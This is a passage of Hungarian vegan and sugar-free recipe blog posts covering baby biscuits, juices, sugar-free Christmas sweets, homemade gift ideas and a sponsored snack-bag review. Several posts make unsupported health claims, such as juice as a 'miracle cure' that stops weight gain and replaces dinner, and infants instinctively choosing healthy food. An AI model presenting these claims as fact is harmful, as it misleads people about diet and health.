úgy 170 fokon. Ne legyen a massza túl száraz, de ne is folyjon.Nekem van egy 23x23 cm-es szögletes tortaformám, melynek az alja kivehető. Tettem az aljára zsírpapírt, majd beleborítottam a masszát. Jó alaposan szétegyengettem, úgy 1 cm vastag lett.Már csak be kell tenni a sütőbe, és úgy 20-25 percig sütni mindaddig, amíg egy picit barnulni nem kezd a teteje.Ne várjuk ettől a müzlitől, hogy olyan kemény legyen, mint a bolti. Az alma miatt puha, de nem morzsálódik, könnyen ehető és csomagolható. Zsófi lányom, aki igen szereti a hasát, még kitalálta, hogy tegyünk rá házi nutellát és egy kis tejszínhabot. De önmagában is finom volt.

Fahéjas aszaltszilva krém

2015. március 3. Gréta konyhája 

Fahéjas aszaltszilva krém Cukormentes, és csak két hozzávalóból áll.  Energiát ad, rendben tartja a salaktalanítást, csodafinom, krémes, fűszeres, és nem hizlaló. Sütikrémnek, pudingnak, nassolni, sült tofu mellé, vagy akárhogyan, teljes a rajongás :)) Egy zacskó aszaltszilvát megmostam, és éjszakára beáztattam langyos vízbe. Reggel turmixgépbe tettem, megszórtam fahéjjal, és lassú fokozaton adagoltam hozzá az áztatóvizét, míg a kellő állagú nem lett.  Hűtőb en egy hétig is eláll. Jó étvágyat!  

Babakonyha. 1.rész. A TE döntésed, a te felelősséged

2015. március 1. Éltető ételek 

Babakonyha. 1.rész. A TE döntésed, a te felelősségedMiért gondoljuk azt, hogy egy baba táplálásának másképp kell történnie, mint egy felnőtt ember egészséges táplálkozásának? Ezen azt értem, hogy vannak olyan alapelvek, amelyeket minden esetben be kell tartani, függetlenül attól, hogy az a baba étele, vagy éppen egy felnőtté.  Most nézzük meg, hogy mire figyeljünk oda, amikor ételt vagy italt adunk a gyerekünknek.  A szülő felelőssége, hogy mit eszik a gyerek  Az, hogy mit eszik egy gyerek, az a szülő felelőssége (döntése). Nem a szomszédé, nem az anyósé és nem is a védőnőé! Persze lehet tanácsot kérni, sőt kell is. Ma már nagyon sok információhoz hozzá tudunk jutni, nem úgy, mint mondjuk 12 éve, amikor csak a védőnőnek és a nagymamának hihettünk. Nekem a nagylányom 13 éves lesz, bizony születése után mit nem adtam volna, ha a kezembe foghatok egy egészséges babatáplálós könyvet.  Nem mertem főzni, egyszerűbb volt megvenni a bébiételeket, persze a védőnő is ezt tanácsolta. Meg azt gondoltam, hogy egy bébiételnek különlegesnek kell lennie, hiszen mégiscsak egy bébiétel, pedig ezek elkészítése a legegyszerűbb. A második és a harmadik lányomnál már más volt a helyzet. Rájöttem, hogy nem kell túlkomplikálni a dolgokat. Mindennap főztem nekik ebédet, és friss gyümölcsöket, zöldségeket kaptak.  A babáknak még működnek az ösztöneik Vannak kutatások, pro és kontra vélemények - mint pl. a glutén bevezetése -, de szerintem nagy hibát nem tudunk elkövetni, ha teljes értékű ételeket adunk a babánknak. Ők még elég okosak ahhoz, hogy ÖSZTÖNÖSEN tudják, mi a jó nekik.  Ne gondoljuk azt, hogy ha készítünk egy banános-zabos kekszet, az a babának nem fog ízleni, mert nekünk se ízlik. A babának még nincs kialakulva az ízérzéke, neki nem kell sózni, édesíteni, fűszerezni az ételeit. A mi ízlésünk már kialakult, a babáé még csak most fog, és rajtad múlik, hogy ez milyen lesz. Hidd el, szívesen fogja enni az ilyen egyszerű ételeket is.  Élelmiszeripar = Függőség De ha a szülő elrontja, na, akkor van a baj. Ordít a gyerek? Veszek neki a közeli látványpékségből valami "finomságot". Legközelebb, ha arra járunk, már az illatot érezve ordítani fog, hogy az bizony kell neki. Ez nem más, mint egy függőség kialakulása . Ezekben a félkész ételekben olyan adalékanyagok, illatanyagok vannak, amelyekre azon nyomban beindul a pavlovi reflex, és bizony a gyerek követelni fogja magának. És mit tesz egy anyuka, aki nem akar hisztit? Megveszi neki!  Az élelmiszeripar manipulálja a gyerekek, majd ezáltal a felnőttek ízlését . Garantálja a piacot még 50 év múlva is. Mit szeret a gyerek? Legyen édes, tetszetős csomagolású... ennyi. Miért van az, hogy a gyerek az eperjoghurtot szereti, maga az eper meg nem ízlik neki? Hát azért, mert elsőként az eperjoghurttal találkozott. Ehhez viszonyít. Az édes, mű ízhez! Nem ismerik a természetes ízeket! Mi, szülők vagyunk az oka annak, hogy a gyerek válogatós! Nem hagyjuk az ösztöneiket szabadon érvényesülni. Legyen megfelelő kínálat az asztalon, változatosan. Ismerjen meg minél több zöldséget, gyümölcsöt, gabonákat. Ekkor még nincs előítélet, hogy pfújjj brokkoli, ekkor még simán megkóstolja és eldönti, hogy kell-e neki. A későbbiekben ismertetett BLW módszernek is részben ez a lényege.  Persze lehetnek egyéb egészségügyi okok, ami miatt válogatós. Ilyen pl. az ételintolerancia, amikor a gyerek ösztönösen tudná, hogy az nem jó neki, de a szülő meg nem tud vagy nem akar mást adni! Pedig lehetne!!! 

Édes bundás kenyér kesudiós-banános töltelékkel

2015. február 27. Vegagyerek 

Édes bundás kenyér kesudiós-banános töltelékkel Bundás kenyér édes változatában nekem ez volt az első próbálkozásom. Amennyire ódzkodtam tőle az elején, a végére csak annyi volt a gondolatom, de kár, hogy elfogyott... :)) Próbáljátok ki, nem bánjátok meg! Édes bundás kenyér kesudiós-banános töltelékkelElkészítési idő: kb. 25 perc Hozzávalók (2 főre): A pirítóshoz 60 g kesudiókrém 1/­­2 tk. őrölt vanília 1 csipet tengeri só 1 ek. agave szirup 4 szelet teljes kiőrlésű kenyér 1 banán A bundázáshoz 60 g teljes kiőrlésű liszt 105 ml szójatej 30 g agave szirup 1 tk. őrölt vanília 1 csipet tengeri só 1/­­2 tk. őrölt fahéj 30 g cukormentes kukoricapehely 10 g puffasztott amaránt 5 ek. kókuszolaj A kesukrémet az őrölt vaníliával, a sóval és az agave sziruppal krémesre keverjük, majd ezzel a krémmel bekenjük a kenyérszeleteket. Meghámozzuk a banánt, vékony szeletekre vágjuk és elosztjuk két szelet kenyéren. Mindegyik banános szeletre ráteszünk egy másikat is, és kicsit összenyomjuk.  A bundázáshoz egy habverővel összekeverjük a lisztet a szójatejjel, az agave sziruppal, a vaníliával, a sóval és fahéjjal. A kukoricapelyhet kézzel összemorzsoljuk, egy mély tányérba tesszük, és elkeverjük a puffasztott amaránttal. A kókuszolajat felhevítjük egy serpenyőben. A kenyérszeleteket belemártjuk a lisztes keverékbe, majd belehempergetjük az amarántos kukoricapehelybe. A szendvics mindkét oldalát 3-4 percig sütjük a kókuszolajban közepes hőfokon. A vékonyabbik oldalát is süssük meg, a kenyeret kicsit az élére állítva. Papírtörlőre szedjük és friss gyümölccsel tálaljuk. Forrás: Attila Hildmann: Vegan for Fit

Cukormentes almás-zabos babakeksz

2015. február 24. Éltető ételek 

Cukormentes almás-zabos babakekszGyümölcsös, zabos, finom és puha. A gyümölcsök szabadon variálhatók benne, akár friss szilvával vagy éppen sárgabarackkal is elkészíthetjük. A hozzátáplálás során az első ételek között lehet, úgy 7-8 hónapos korban nyugodtan kaphatják a babák. De a nagyobbaknak is ízleni fog. A lányaim pár perc alatt eltüntették. Hozzávalók: - 30 dkg alma - 1 banán - 15 dkg aprószemű zabpehely - 5 dkg gesztenyeliszt - 5 dkg mazsola - 3-4 szem aszalt sárgabarack vagy aszalt szilva (cukor- és kénmentes) - 1 teáskanál fahéj - 1/­­2 mokkáskanál szegfűszeg - 1/­­2 mokkáskanál vaníliapor - 2 kávéskanál chiamag - csipet só Elkészítése: A gyümölcsöket alaposan mossuk meg, én em-bioba is be szoktam áztatni. Hámozni nem szoktam, sőt a magházát sem vágom ki. Daraboljuk fel kisebb méretűre az almát és a banánt, majd botmixerezzük krémesre. Adjuk hozzá az aszalványokat, majd ezt is turmixoljuk hozzá. Szórjuk bele a zabpelyhet és a lisztet, és a többi hozzávalót is. Egy sűrű masszánk lesz. Tegyük félre úgy fél-1 órára. Egy tepsibe tegyünk zsírpapírt, majd halmozzunk 1-1 evőkanálnyi mennyiségeket. Lapogassuk ki, formázzunk óvatosan. Előmelegített sütőben (170 fok) süssük úgy 20 percig. Időnként nézzünk rá, és meg szoktam fordítani, amikor az alja már kezd pirosodni. Rugalmas, puha kekszünk lesz, a babák szeretni fogják.

Lapos has koktél

2015. február 4. Gréta konyhája 

Lapos has koktél Nem fog ki rajtunk a tél, hiszen ilyenkor is van zeller, alma és gyömbér, amivel megállíthatjuk a vizesedést, a haspuffadást, és a további kilók ránk rakódását, ha kipréseljük levüket. Én negyedik hete iszom ezt a juice kombinációt minden este, néha kiegészítem még bébispenóttal, petrezselyemmel, répával, vagy céklával is. A zeller nagyon jó vízhajtó, és naran csbőr takarító is, a gyömbér segíti az emésztést, gyorsítja az anyagcserét, és energiát ad. Az alma, meg alma. Csodaszer! Az eredmény, lapos, tónusos has(persze ehhez torna is szükséges!), jobb közérzet, könnyebb és gyorsabb emésztés, kirobbanó energia, és ragyogó bőr.  Még mindig cukormentesen, és már nem is hiányzik. Koktél:   Préselj ki 3 alma ujjnyi firss tisztított gyömbér, és 5-6 halványító zellerszál levét. Érdemes este, vacsora helyett fogyasztani, így a juice nem terheli meg az emésztőrendszert, mégis táplálja, és tisztítja alvás közben. Jó étvágyat! 

Mit eszik a vegagyerek? (vegán baba)

2015. január 13. Zizi kalandjai 

Mit eszik a vegagyerek? (vegán baba) Pár hónapja egy nagyon kedves barátnőm felhívott, hogy ő, mint családanya szeretne változtatni a táplálkozási szokásaikon és segítsek ebben neki. Na, azóta nem sikerült időpontot egyeztetnünk, hogy beszélgessünk egy kicsit a témáról. Ha egyszer lesz egy kis felesleges időm, akkor írok majd egy bejegyzést arról, hogy hogyan érdemes elindulni az egészséges(ebb) táplálkozás irányába vagy éppen a vegetáriánus, vegán étkezés irányába. Addig is segítségül szolgálhatnak ezek a bejegyzések, ugyanis nemcsak a vegagyerek eszi ezeket a finomságokat, hanem a vegagyerek szülei is, vagyis az egész család. Tartjuk magunkat a vegán étrendhez és a cukormentességhez is. Karácsonykor anyukám sütött vegán kalácsot, abban volt egy minimális mennyiségű nádcukor, de mást (csoki, keksz, stb.) Ádi nem evett még. Most kezdtem el adni neki datolya golyókat, ezek ugye édesek és ízlik neki, de nem eszik meg egy egészet, csak nyomot hagy a golyókban. Ezenkívül imádja anyukám cukormentes szilvalekvárját, képes belőle elég sokat enni, ha hozzájut az üveghez. Reggelire vagy gyümölcsöt vagy kását eszik. Ebédre mindig főzök, kivéve egy-két alkalmat, amikor házon kívül eszünk. Vacsorára pedig hideget adok: olívabogyó, uborka, csírák, savanyú káposzta, avokádó, vegazsíros vagy pástétomos kenyér – ezek variálódnak most a téli időszakban. Instagramon továbbra is várom a képeiteket #miteszikavegagyerek hashtaggel. Gyűlnek már a képek, de jó lenne minél több, hogy onnan is tudjuk egymást inspirálni! És akkor jöjjenek az ételek… Paradicsomos spagetti, édesburgonya fasírt, párolt brokkoli és karfiol Sütőtökös chili tepsiben sült rozmaringos krumplival Pirított hagymás csicseriborsó, pirított fokhagymás tofu, pirított fokhagymás citromos leveleskel és rizs Vegán Alfredo szószos farfalle tészta, párolt fokhagymás zöldbabbal Bab-zab fasírt maradék zöldbabbal, krumplipüré és pirított fokhagymás répa Karfiol-barnarizs gratin, sütőtökpüré és pirított fokhagymás citromos leveleskel Sütőtökös chili, rizs és tortilla chips Brokkolis sajtos tészta Édesburgonya chips citromos tahini szósszal, pirított fokhagymás tofu és leveleskel, valamint rizs Brokkoli és karfiol paradicsomos raguban, kukoricalepény

Szilvakrémleves gesztenyehabbal

2014. december 31. VegaLife 

Szilvakrémleves gesztenyehabbal Ez a recept méltó befejezése a 2014-es évnek. Most, az évvégi napokon készítettem el. Az év utolsó hónapjaiban el-elámultam a meleg időjáráson, valószínű ezért is láthattam még a piacokon december második felében is szilvát. Érett volt, semmi kétség. Íze is volt. S forrón... Hm... de akár kellemes melegen is nem csak a testet melengeti, de a léleknek is felüdülés. Talán még évzáró-évnyitó étkezéseinkhez is elkészíthetjük, ha van otthon a fagyasztóban eltéve egy kis szilva vagy a kamra polcán egy befőttünk. Különlegessége a gesztenyehab, ami tejszínhab gesztenyemasszával együtt felverve. A recept Hozzávalók: - 1/­­2 kg szilva - víz - datolya vagy banán vagy nyírfacukor vagy gyümölcscukor, stb. - 2 dl növényi tej Elkészítés: A szilvákat két részre osztjuk: kb. 12-16 elfelezett szemet megtartunk, a többit egy kevés vízzel és datolyával vagy banánnal, vagy  nyírfacukor vagy gyümölcscukor, stb. feltesszük főzni. Rottyan egy keveset, majd a megpuhult szilvákat összeturmixoljuk. Turmixolás közben hozzáadjuk a növényi tejet. Ha kész, lábosba öntjük, hozzáadjuk a meghagyott félbevágott szilvákat és a forráspontig főzzük. A tejszínt (nekem Hulala volt most, de kókuszhab is nagyszerű) felverjük, s közben hozzáadjunk egy-két kanálnyi gesztenyemasszát (kapható natúr, ami cukormentes, ezt ajánlom). Az így felvert tejszínből a meleg szilvalevesbe kanalazunk tálaláskor (ügyesebben is megoldható, mint ahogy nekem sikerült, de már nagyon ették volna a vendégek :) ). Nem kell jó étvágyat kívánnom hozzá, mert rendkívül élvezetes, "melengeti" a testet, lelket. :)

Ajándék ötletek karácsonyra. Csináld magad, ne vedd meg!

2014. december 6. Éltető ételek 

Nincs ötleted, hogy mit ajándékozz családtagjaidnak? Már nem akarsz ötödik nyakkendőt venni a párodnak, és botmixert az anyósodnak? Nos, akkor készíts saját készítésű ajándékot karácsonyra . Hidd el, sokkal nagyobb sikere lesz, mint az ötödik nyakkendőnek. A karácsony sokkal meghatóbb és szeretetteljesebb, ha olyan ajándékot adunk szeretteinknek, amiket magunk készítünk el. Persze ez egy kicsit komolyabb előkészületet igényel, mivel ezek elkészítése időigényesebb, mint a boltban megvásárolni. A hölgyek talán könnyebben tudnak készíteni ehető ajándékokat , mint a férfiak. De azért vannak igazán egyszerű ötletek is, amiket akár egy férj is el tud készíteni a párjának. Készíthetünk egyszerű kekszeket , melyeket szép díszdobozba csomagolunk, szalaggal átkötünk.  Szaloncukor receptek egyben trüffelek is, és készíthetünk nyers csokit , melyet kedvenc aszalványunkkal ízesítünk. De aszalványt is márthatunk csokiba , melyet kedves kis pohárba csomagolva remek ajándék lesz.  Mézbe tehetünk aszalványokat és magvakat, kész is a mézes diákcsemege . Aszalhatunk vagy süthetünk müzlit, de bolti alapanyagokból is összeállíthatunk egészséges müzlit.  A házi nutellának is nagy sikere lesz. Készíthetünk csokis kanalat , melyhez nyers csokit készítünk. Hogyan használjuk? Egyszerűen tegyük forró mandulatejbe, és kész is van a csokis tej. Számos iható ajándékot is készíthetünk. Keverjünk különböző alapanyagokból ízletes gyümölcsteát , vagy reszeljünk le 70%-os keserűcsokit, melyet ízesítünk vaníliaporral, kókuszvirágcukorral és kakaóporral. Kész is a forrócsoki alapunk. Tegyük egy szép, díszes üvegbe, és kész is az egyszerű, de nagyszerű ajándék. Konyhatündéreknek készítsünk fűszerolajat , egyedi fűszerkeverékeket, fűszersót, vaníliás kókuszcukrot . Nyáron eltett cukormentes lekvárok is kerülhetnek a csomagba. Száríthatunk ételízesítőt vagy sóval is tartósíthatjuk. Készíthetünk egy szakácskönyvet , melybe bevált receptek kerülnek fotóval együtt.  Instant sütit is készíthetünk, mármint egy bevált receptünk száraz hozzávalóit díszes üvegbe tesszük. Mellékeljük hozzá a receptet is. Mindenképp teljesértékű alapanyagokat használjunk. Ha már végképp nem tudunk mit venni kedvesünknek, akkor legtöbbször egy drogériában kötünk ki. Nos, nagyon jó ötletek vannak kenhető ajándékok terén. Készíthetünk testvajat sheavajból és illóolajokból vagy testradírt , de sikere lesz egy kézkrémnek vagy egy ajakápolónak is. Csak jó minőségű alapanyagokra van szükség, vízgőz felett összeolvasztjuk, majd egy kis csinos tégelybe öntjük.  Levendulás-teafás dezodort is készíthetünk, vagy szappant is önthetünk. De illatos parfümöt is készíthetünk, melynek alapja alkohol, és kiváló minőségű illóolajok kerülnek bele. Ha már az illóolajoknál tartunk, akkor készíthetünk masszázsolajat is, melybe kedvenc illók kerülnek. Agyagporból akár fogport is készíthetünk. Remek ajándék, és egyébként a drogériákban sok pénzért árulják, a fürdősó . Ehhez nem kell más, mint durvaszemű tengeri só, melybe 100%-os tisztaságú illóolaj, egy kevéske szódabikarbóna és tetszőleges szárított gyógynövény kerül.  Gyógyhatású készítményeket   is készíthetünk, de ezt már most kezdjük el, mivel ezeknek az elkészítése, érlelése legalább 2 hét. Akár egy körömvirágkrém vagy egy fekete nadálytő tinktúra is sikeres lehet, ha tudjuk, hogy az ismerősünknek arra van szüksége. De édeskömény, bodzavirág vagy éppen lándzsás útifű tinktúrát is készíthetünk. Gyerekes családokban csipkebogyós méz vagy csillagánizsos méz is készülhet, de ha hársmézbe 100%-os fenyő, kakukkfű illóolajat teszünk, kész is a köhögéscsillapító gyógymézünk . Lakásdíszként remek ötlet egy szép mécsestartó , mely alapja egy befőttes üveg. Kívülről festünk rá, vagy bevonjuk papírral, textillel, csipkével. De fahéjrúdakkal is bevonhatunk egy nagy gyertyát, vagy akár egy asztali tolltartót is. Gyöngyökből vagy akár EM kerámiából csodaszép karkötő vagy nyaklánc készíthető, de hűtőmágnes vagy mágneses könyvjelző is kedves és személyes ajándék lehet. A nagyszülők a legjobban az unokákkal kapcsolatos ajándékoknak örülnek. Készíthetünk naptárat , vagy a gyerkőc kezecskéjét gipszbe nyomjuk, majd ezt kifestjük. De az unokáról egy fénykép mindig jó ötlet, melyet különleges keretbe tehetünk. Kisebb lánykáknak remek ajándék a babaház . Ehhez egy ügyeskezű apukára van szükség. Egyszerű kartondobozból is készülhet, de komolyabb bútorlapból is. De babaruhákat is készíthetnek ügyeskezű anyukák. Saját készítésű társasjáték , vagy egy szivaccsal kitömött labda is nagy örömet tud okozni. Kesztyűbábok vagy fakanálbábok is készülhetnek.  Egy kis kézügyességgel egyszerű fehér pohárra porcelánfestékkel egyedi poharat készíthetünk. Rengeteg ötlet van, órákig lehetne sorolni. Remélem, hogy kaptatok ötleteket ahhoz, hogy ne vásároljátok az ajándékokat, hanem ti készítsétek el.

Tudod, mi van a bolti szaloncukorban? Így készíts cukormentes szaloncukrot!

2014. december 2. Éltető ételek 

Tudod, mi van a bolti szaloncukorban? Így készíts cukormentes szaloncukrot!Évekkel ezelőtt, a korábbi munkahelyemen karácsonyra mindig kaptunk egy doboz szaloncukrot. Mire eljött a karácsony, már nem volt belőle, mindet felfaltam. Nos, azóta már sok víz lefolyt a Dunán, már évek óta nem veszek a boltban szaloncukrot.  Viszont kíváncsiságból mindig megfordítom az üzletekben a szaloncukros dobozokat, zacskókat, és elolvasom az összetevőket. Elmondhatom, hogy évek óta nincs változás. Mindig ugyanazokat a  "szemét" szaloncukrokat árulják. Igen, valóban így gondolom, ugyanis ezek táplálkozástudományi szempontból semmi értékeset nem tartalmaznak a szervezetünk számára. Sőt... Ha folytatod az olvasást, akkor elárulom, hogy miért is gondolom ezt így. Először is utánanéztem, hogy a Magyar Élelmiszerkönyv mit is ír a szaloncukorról. "A szaloncukor a karácsonyi ünnepkörhöz kötött, hagyományos termék, amely meghatározott szemnagyságú, két végén rojtozott selyempapírba és színes alufóliába vagy fóliába/­­fémgőzölt fóliába, pillangós zárással, szemenként csomagolt édesipari készítmény. A kiszáradás megakadályozására és az élvezeti érték növelésére a szemeket védőbevonattal (kandiszréteg vagy csokoládé-, illetve egyéb bevonat) látják el. " Hát eddig nem  tudtuk meg, hogy mi is az előírás a szaloncukor összetevőit figyelembe véve. Nos, nem is tudjuk meg. Legalábbis ebben az irányelvben nincs meghatározva. Nézzük tovább: "Szaloncukorfajták Kandírozott szaloncukor: olyan szaloncukor, amelynek korpusza cukorkristály réteggel (kandisz) van bevonva.Mártott szaloncukor: olyan szaloncukor, amelynek korpusza ét-, tej- vagy fehércsokoládéval, illetve kakaós, kakaós tej vagy fehér bevonómasszával van bevonva. A bevonat aránya legalább 20%.Töltött (formázott) szaloncukor: olyan szaloncukor, amelynek külső része ét-, tej- fehércsokoládé-vagy bevonómassza. A burok aránya a termék összes tömegének legalább 25%-a.Fondanszaloncukor (konzum szaloncukor): olyan szaloncukor, amelynek korpusza fondanból készül, ízesítőanyagokkal ízesített, kandírozott vagy csokoládéval, illetve egyéb anyaggal van bevonva. Dúsított fondanszaloncukor: olyan szaloncukor, amelynek korpusza olajosmagvak, gyümölcsök, puffasztott gabonafélék stb. felhasználásával készül. A dúsítóanyagok mennyisége legalább 5% (m/­­m).Zselés szaloncukor: olyan szaloncukor, amelynek korpusza zselé, illetve gyümölcszselé.Marcipán-szaloncukor: olyan szaloncukor, amelynek korpusza mandulamarcipán, mogyorómarcipán, diómarcipán, kókuszmarcipán vagy vegyes marcipán. Vajkaramellás szaloncukor: olyan szaloncukor, amelynek korpusza vajkaramella." Kíváncsiságból tovább keresgéltem, hogy mit is ír az egyes cukorfajtákról: "Zselécukorka: A zselécukorkák kocsonyás, könnyen deformálható szerkezetű kolloid rendszerek, amelyeket cukor, glükózszirup, esetleg invertcukorszirup, különféle zselésítőanyagok és jellegkialakító adalékanyagok (ízesítő, színező) felhasználásával öntéssel formáznak és a felületüket védőbevonattal (kristálycukor, csokoládé, bevonómassza stb.) látják el.  A megnevezés tartalmazza a ,,zselé vagy a 2,5% gyümölcs szárazanyagot tartalmazó termék esetén a,,gyümölcszselé szavakat, valamint az ízesítésre való utalást. " Akkor most nézzük meg konkrétan egy híres cukorgyár zselés szaloncukorjának összetevőjét: Málna ízű sziruppal töltött, citrom ízű zselé, kakaós étbevonó masszával mártva: cukor, glükóz szirup, kakaós étbevonó massza 20% [cukor, növényi zsír, zsírszegény kakaópor(10%), emulgeálószer (szójalecitin), aromák (csokoládé- vanília)], étkezési sav (citromsav), zselésítő anyag (pektin), aromák ( citrom, málna), színezék (E120) TI EZT MEG AKARJÁTOK ENNI??? Vagy ezt adjátok a gyerekeiteknek?? Semmi természetes NINCS benne! Tovább nem is szeretnék ezzel foglalkozni, inkább mutatok 3 olyan szaloncukor receptet, amit te magad is elkészíthetsz, és még hozzáadott cukrot SEM tartalmaz.  Nem, mintha baj lenne a cukorral, ha az természetes. Nyugodtan használhatsz termelői mézet, kókuszvirágcukrot vagy akár nyers nádcukrot is. NYERS, EGÉSZSÉGES és TÁPLÁLÓ.  1. Narancsos brownie szaloncukor Hát ilyen finomat... nemhiába, a brownie mindig finom. Ez a tészta sok nyers süteményem alapja is, de most csak úgy natúr, szaloncukor készült belőle. Hozzávalók: - 20 dkg áztatott, szárított dió - 10 dkg áztatott, szárított mandula - 20 dkg cukrozatlan, aszalt datolya - 4-5 csepp narancsolaj - 1/­­2 mokkáskanál vaníliapor - 2 evőkanál cukrozatlan kakaópor - csipet só Elkészítése: A diót és a kis darabokra vágott datolyát tegyük egy késes konyhai gépbe, és morzsásra vágjuk. Ezután adjuk hozzá a kakaóport és a mandulát, és csak pár pulzálással daráljuk össze, hogy a mandula kissé nagyobb darabokba maradjon.Cseppentsük bele a narancsolajat, és gyúrjuk össze. Egyesével formáztam belőle szaloncukor formát.Mártsuk be nyers, narancsos csokiba.2. Fahéjas aszaltszilva zselés szaloncukor Hozzávalók: - 10 dkg aszalt szilva (legjobb a házi-, kén-dioxid- és cukormentes) - 10 dkg cukrozatlan aszalt datolya - 1/­­2 mokkáskanál ceyloni fahéj - 1/­­2 mokkáskanál vaníliapor Elkészítése: Először is vágjuk fel az aszalványokat kis darabokra. Éppen csak egy kicsi vizet öntsünk rá, és 1-2 órát hagyjuk puhulni.A felesleges vizet öntsük le róla, és ezután minden mehet a botmixerbe vagy a késes darabolóba. Nem muszáj, hogy teljesen krémes legyen.Ha formázható, akkor készíthetjük is a szaloncukrot. Ha egy kissé lágy lett a massza, akkor terítsük ki úgy 1 cm vastagon és tegyük be az aszalóba, vagy a sütőbe, vagy akár a radiátorra.Ezt szintén mártsuk be nyers csokiba. Én azért tettem hozzá datolyát, mert nekem házi aszalt szilvám van, és egy kissé savanykás. A datolya kellően megédesítette. 3. Zserbó szaloncukor Ennek itt találod a receptjét. A NYERS CSOKI receptjét itt találod. Jó étvágyat!

Forró csoki válogatás hideg napokra

2014. október 22. Zizi kalandjai 

Forró csoki válogatás hideg napokraGondoltam összegyűjtök nektek néhány szuper receptet (a saját blogomról és mások blogjáról), amelyekkel a hosszú hétvégén – főleg, ha hűvös lesz – kényeztethetjük magunkat. Egyetek jókat, pihenjetek sokat és kényeztessétek, melengessétek magatokat forró italokkal! Vegán krémes sűrű forró csoki… eltér a hagyományostól, ugyanis az alapját kesudiótej adja. Datolyával és juharsziruppal van édesítve, csokoládé van beleolvasztva és tényleg sűrű lesz a végeredmény. Recept itt! Sütőtökös latte… mennyei, habos, sütőtökpürével felturbózva! Recept itt! Vegán forró fűszeres kakaó… csipet fahéjjal és cayenne borssal fűszerezve. Recept itt!  Kedvencek más blogokról: - Kókusztejes cukormentes forró csoki Chili és Vanília Zsófitól - Jamie Oliver tuti befutó forró csokoládéja - Vegán fehér forró csoki (másképp) Csokiországból - Vegán földimogyoróvajas forró csokoládé az Oh She Glows blogról - Vegán mentás matcha latte a Healthy Happy Life blogról - Vegán kókuszos mocha a Healthy Happy Life blogról - Meleg fűszeres almás répa ital a Green Kitchen Stories blogról - Forró csoki Fűszer és Lélek Esztertől - Sűrű forró csokoládé Lila Füge Dórától - Forró csoki pálcák karamellizált fehér csokiból Praliné Paradicsom Zsuzsitól - Sűrű forró csokoládé Emiko Davies blogjáról - Vegán levendulás forró csokoládé Nóri Mindenmentes Konyhájából - Forró fehér csoki szerecsendióval Vegasztrománia Annától (+ Forralt bor chilivel, gyömbérrel és grapefruittal)

Táplálj helyesen édesanyám! (6. rész) + Kedvezménykupon

2014. szeptember 30. Zizi kalandjai 

Táplálj helyesen édesanyám! (6. rész) + Kedvezménykupon Többen kértétek, hogy adjak tippeket milyen ételeket érdemes vagy jó uzsonnára, snacknek pakolni egy majdnem másfél éves babának. Ádi most már szinte ugyanazokat eszi, amelyeket mi is fogyasztunk. Tízórait ritkábban eszik, mert később szokott reggelizni (nem egy koránkelő baba), azonban a délutáni alvás után mindig van egy- vagy többféle finomság, amit megkóstol. Ez függ attól is, hogy otthon vagyunk vagy éppen úton. Ha otthon vagyunk bármilyen étel szóba jöhet, mert minden a rendelkezésünkre áll: kanál, villa, tányér, asztal, stb. Ha úton vagyunk valahova, akkor érdemes olyat csomagolni, amely könnyen fogyasztható, kézzel/­­kanállal ehető, nem maszatol túlzottan, ráadásul finom és egészséges is. Néhány tipp, hogy nálunk mi a menő snack: - szezonális gyümölcsök: alma, narancs, banán, szőlő, avokádó - szezonális zöldségek: répa, sült sütőtök - vegán sajt kockákra vágva - natúr kölesgolyó - Alnatura teljeskiörlésű ropi - almás zab palacsinta - banános palacsinta - cukormentes tripla szezámos keksz Az almát szereti egészben is enni, de vághatjuk szeletekre, kockákra, ha még nehezebben rág a baba. A narancsot többnyire megpucolva, gerezdekre szedve csomagolom el. A banánt és szőlőt önállóan eszi Ádi, az avokádót pedig vihetjük félbe vágva, folpackba csomagolva és kanállal eszi meg a húsát a baba. Ádi a répát simán elrágcsálja, a sült sütőtök pedig szintén kanállal ehető. A vegán sajthoz jól passzol a natúr kölesgolyó vagy a ropi (amely egyébként cukormentes is!). Persze mindez az őszi szezonhoz igazodik, ha nyár lenne, nyilván mást pakolnék uzsonnára. Ami az innivalót tekinti, többnyire vizet vagy almalevet viszünk magunkkal. Szeretem vidám, környezetbarát dolgokba csomagolni az uzsonnát. Beszerezés alatt vannak rozsdamentes acél dobozkák, amelyekbe sok minden tehető. Fontosnak tartom, hogy ha műanyag dolgot használok, akkor azok BPA és PVC mentesek legyenek (erről bővebben írtam itt). A Skip*Hop Magyarországtól lehetőséget kaptunk újabb termékek tesztelésére, olyan termékekére, amelyek az uzsonnáztatást teszik színesebbé, vidámabbá. Uzsonnás táskájuk 13 féle színben (állat formában) kapható. A kis ételtároló táska belseje hőszigetelt, frissen tartja a benne tárolt ételt. Tágas egyterű rekeszében praktikusan helyezhető el a szendvics, gyümölcs, snack vagy ital stb. Belső hálós zsebében evőeszköz, szalvéta is tárolható, ezenkívül beleírhatjuk a gyermekünk nevét. Könnyen tisztítható, nedves ruhával letörölhető, lemosható. Hátizsákként nem használható, csak kézben fogható vagy felakasztható (pl: a babakocsira). A kulacsaik (11 féle színben kapható) BPA-mentesek, ftalát-mentesek, és PVC-mentesek. Minden kulacsban szívószál található, amelyet flip-top kupak véd, így a kulacs nem csöpög. Az üveg és a szívószál is könnyen tisztítható, mosogatógépben mosható. Tartozik hozzá egy extra, pót szívószál is. Ádi nagyon szépen iszik már pohárból, palackból is, de a szívószállal még csak ismerkedik. Tetszik neki, ha buborékot fújok vele a kulacsba vagy a pohárba, tanítom a használatára, de egyelőre még nem a rendeltetésének megfelelően használja. Mindkét termék elnyerte a tetszésünket. Ádi uzsonnáját sokszor a táskámba tettem bele, külön volt minden, a cumisüvegtől kezdve a kis dobozkákig. Az uzsonnás táska maximálisan ki van használva, mindent egy helyre tudok tenni, Ádi pedig imádja hordozgatni, kinyitni, ki- és bepakolni belőle mindent. A kulaccsal pedig egyelőre ismerkedünk, biztos vagyok benne, hogy hamarosan menni fog a szívószállal való ivás. Anya magyaráz, Ádi koncentrál A Skip*Hop elérhető az alábbi linkeken: - weboldal - Facebook oldal Skip*Hop Magyarország és Monkie Az uzsonnás táskát és a kulacsot a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! Aki 2014. szeptember 29 és 2014. október 10-e között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: 